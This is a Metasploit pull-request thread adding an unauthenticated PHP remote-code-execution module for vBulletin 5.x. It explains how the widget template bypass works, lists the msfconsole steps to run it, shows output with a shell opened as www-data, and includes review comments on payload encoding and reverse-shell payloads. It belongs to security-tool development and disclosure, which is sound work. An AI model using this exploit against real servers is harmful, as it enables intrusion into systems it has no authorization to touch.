Vbulletin widget template rce
rapid7/metasploit-framework pull request #13970
Opened 2020-08-09 23:29 UTC by Zenofex

This pull request adds a vBulletin 5.x remote code execution module.

This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument which causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. 

This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux 19.04 .

## Verification

1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
2. Do: `set RHOSTS [IP]`
3. Do: `set VHOST [HOSTNAME]`
4. Do: `set LHOST [IP]`
5. Do: `set TARGETURI [PATH]`
6. Do: `set PAYLOAD [PAYLOADNUM]`
7. Do: `run`

## Example Output

```
msf6 > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf6 exploit(multi/http/vbulletin_widget_template_rce) > run
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

2020-08-11 15:08 UTC, todb-r7 commented
I'll tag this with a CVE ID today, and also make sure that the folks at vBulletin know about it.

2020-08-11 22:03 UTC, smcintyre-r7 requested changes
This all looks good to me, great use of `AutoCheck`! It's not every day we can actually exploit the vulnerability within the check method to determine it's presence so that's awesome.

The only request I have is around some style items. There's a few things caught by rubocop when running it on the module. I'm going to tag this as "needs-linting" and there will be some instructions that come along with that.

2020-08-11 22:07 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +    ])
It's not necessary to register this option, it's handled for you by the mixin.

2020-08-11 22:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +            'BadChars' => "\x22",
Shouldn't the other two payloads have this `BadChars` value as well?

2020-08-12 00:11 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +            'BadChars' => "\x22",
BadChars was not needed, removed from all payloads.

2020-08-12 00:11 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +    ])
thanks, removed!

2020-08-12 00:15 UTC, Zenofex reviewed
Made the requested changes

2020-08-12 13:23 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +    return("echo #{datastore['PHP_CMD']}('#{command}'); exit;")
The module was not working when I was testing with a command payload like `cmd/unix/reverse_python`. It appeared to be an issue with the not escaping the single quotes.

I updated this to the following which seemed to have addressed it.
```suggestion
    "echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;"
```

2020-08-12 13:27 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_widget_template_rce.rb
> +    return("echo #{datastore['PHP_CMD']}('#{command}'); exit;")
Looks great, thank you @smcintyre-r7 !

2020-08-12 16:52 UTC, smcintyre-r7 approved these changes

2020-08-12 18:02 UTC, smcintyre-r7 commented
Alright, thanks for that last commit! With that in place this looks good to land. I successfully tested the PHP meterpreter payload, the CMD payload with output using the default `cmd/unix/generic` and the CMD payload for a reverse shell using `cmd/unix/reverse_php_ssl`. 

Thanks @Zenofex !

2020-08-12 18:03 UTC, merged

2020-08-12 18:05 UTC, smcintyre-r7 commented
# Release Notes
This adds a module for an unauthenticated remote code execution vulnerability in VBulletin identified as CVE-2020-7373. The vulnerability, when exploited, allows an attacker to execute arbitrary PHP code within the context of the application server (a non-root account) by submitting a specially crafted HTTP request.

2020-08-13 05:48 UTC, cfi-gb commented
@todb-r7 
> I'll tag this with a CVE ID today, and also make sure that the folks at vBulletin know about it.

Could you clarify where "CVE-2020-7373" added in 19618d9bd259c0f9d3b28b53b0ba41a71420430a is coming from? It seems https://nvd.nist.gov/vuln/detail/CVE-2020-17496 is used for this by Mitre.

2020-08-13 18:03 UTC, todb-r7 commented
Hi @cfi-gb -- this is from Rapid7's pool of CVE numbers we use to assign for research-based vulnerabilities in 3rd party products. It'll be updated in the next day or two on MITRE's side. (All unassigned CVEs will show as RESERVED by MITRE until they're populated downstream, which is why it might appear to be a MITRE thing right now.)

2020-08-14 05:08 UTC, cfi-gb commented
Thanks for clarification. Then it seems two CVEs (CVE-2020-7373 and CVE-2020-17496) got assigned for the very same vulnerability and one might need to be rejected to avoid duplicates.

2020-08-14 13:23 UTC, todb-r7 commented
Well, heck. Thanks @cfi-gb . Do you know from whence CVE-2020-17496 came from? It was issued by MITRE, so I'm curious who the go-getter was who requested the number. :)

In the meantime, I'll fix up the module to use that, rather than have two.

2020-08-14 13:41 UTC, cfi-gb commented
Unfortunately i don't know there the second is coming from, hoped to get this info here :-)

Ref for the change of the CVE to the one issued by MITRE: #13997